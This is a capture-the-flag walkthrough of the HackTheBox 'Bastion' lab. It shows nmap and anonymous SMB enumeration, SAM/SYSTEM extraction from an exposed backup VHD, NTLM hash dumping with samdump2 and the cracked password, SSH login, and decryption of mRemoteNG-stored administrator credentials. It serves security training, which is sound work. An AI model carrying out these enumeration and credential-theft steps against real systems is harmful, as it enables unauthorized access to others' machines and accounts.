Summary:
Bastion was one of the first few easy boxes that initially introduced me to HackTheBox. Created by L4mpje, a security enthusiast and hobbyist hacker, this box covers realistic Windows environment misconfigurations like unauthenticated file-shares and vulnerable apps with insecure password storage.
Finding a Foothold
Initial Enumeration:
root@kali:~/htb/# nmap -sV -sC -oA nmap/Bastion 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 13:31 AKDT
Nmap scan report for 10.10.10.134
Host is up (0.50s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h48m16s, deviation: 1h09m14s, median: 2h28m14s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-09-06T02:00:32+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-09-06T00:00:31
|_ start_date: 2019-09-05T22:49:39
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.07 seconds
Nmap indicates that Windows Service Message Block (smb) is an open port and guest authentication is supported. We can scan the host as anonymous for open smb shares using SMBMap.
root@kali:~/htb/Bastion# smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
Backups READ, WRITE
C$ NO ACCESS
IPC$ READ ONLY
From the scan, Backups is the only accessible network share on the Windows Server. We can enumerate the contents of the share like so:
root@kali:~/htb/Bastion# smbmap -u anonymous -H 10.10.10.134 -R Backups
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
Backups READ, WRITE
[!] Unable to remove test directory at \\10.10.10.134\Backups\huxZgSFPbY, plreae remove manually
.\
dr--r--r-- 0 Thu Sep 5 16:28:09 2019 .
dr--r--r-- 0 Thu Sep 5 16:28:09 2019 ..
-w--w--w-- 116 Tue Apr 16 03:43:19 2019 note.txt
...
.\\WindowsImageBackup\
dr--r--r-- 0 Fri Feb 22 03:44:02 2019 .
dr--r--r-- 0 Fri Feb 22 03:44:02 2019 ..
dr--r--r-- 0 Fri Feb 22 03:45:32 2019 L4mpje-PC
.\\WindowsImageBackup\L4mpje-PC\
dr--r--r-- 0 Fri Feb 22 03:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 03:45:32 2019 ..
dr--r--r-- 0 Fri Feb 22 03:45:32 2019 Backup 2019-02-22 124351
...
There are backups on the drive as well as a .txt file called note.txt. We can download the file and read it like so:
smbmap -u anonymous -H 10.10.10.134 -R Backups -A note.txt
root@kali:~/htb/Bastion# ls
10.10.10.134-Backups_note.txt
root@kali:~/htb/Bastion# cat 10.10.10.134-Backups_note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Sensitive Information Gathering:
The note left for the systems administrators indicates that the backups are rather large and shouldn't be transferred under normal means. We can mount the share and explore its contents like so:
Exploring the share, we find two virtual hard disks:
To avoid downloading these VHD's, we could try mounting the disk with guestmount in a linux environment, but because Virtual Hard Disks are specifically Microsoft Disk Images, it's easier to explore the disks when connected to the share in a Windows environment:
Because this is an unencrypted virtual hard disk, we can explore the contents of the disk with ease using 7zip, including sensitive directories like Windows\System32\config\, which has the system's SAM and SYSTEM keys.
After extracting both keys to our host, we can recover all active user NTLM hashes using samdump2 (Note: This technique only works if the anniversary update was not installed prior to making the backup):
root@kali:~/htb/Bastion# samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
We can either crack the last user's password hash with hashcat or reverse-lookup the NTLM hash in an online hash lookup repository (assuming this password in rockyou).
Username: L4mpje
NTLM Hash: 26112010952d963c8dc4217daec986d9
Password: bureaulampje
Acquiring user.txt
Getting Shell Access:
We can verify that our credentials are valid using smbmap as L4mpje; however, we notice that we cannot acquire a shell using PsExec because we still do not have read/write access to the ADMIN$ share:
root@kali:~/htb/Bastion# smbmap -u L4mpje -p bureaulampje -H 10.10.10.134
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
Backups READ, WRITE
C$ NO ACCESS
IPC$ READ ONLY
We can, however, connect over ssh as indicated by our nmap scan earlier:
root@kali:~/htb/Bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>hostname
Bastion
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
l4mpje@BASTION C:\Users\L4mpje>type .\Desktop\user.txt
9bf***************************cd
Acquiring Administrator Credentials and root.txt
Poorly Encrypted Passwords:
Enumerating some of installed applications, we find one program that particularly stands out:
PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 16-7-2016 15:23 Common Files
d----- 23-2-2019 09:38 Internet Explorer
d----- 16-7-2016 15:23 Microsoft.NET
da---- 22-2-2019 14:01 mRemoteNG
d----- 23-2-2019 10:22 Windows Defender
d----- 23-2-2019 09:38 Windows Mail
d----- 23-2-2019 10:22 Windows Media Player
d----- 16-7-2016 15:23 Windows Multimedia Platform
d----- 16-7-2016 15:23 Windows NT
d----- 23-2-2019 10:22 Windows Photo Viewer
d----- 16-7-2016 15:23 Windows Portable Devices
d----- 16-7-2016 15:23 WindowsPowerShell
Researching this application yields an insecure password storage vulnerability in older versions of the application. Using mremoteng-decrypt, we can decrypt the credentials of the administrator user:
We can then ssh into the server as the administrator user and recover root.txt:
root@kali:~/htb/Bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>hostname
Bastion
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
administrator@BASTION C:\Users\Administrator>type .\Desktop\root.txt
958***************************c8
We pwned the built-in Administrator user!
Although the journey to the administrator user wasn't too difficult, what ultimately makes this box a genuinely good box is that it shares many of the qualities (and vulnerabilities/over-zealous permissions) that real-world environments have.
— Rayce Toms
Student Researcher
Comments
Post a Comment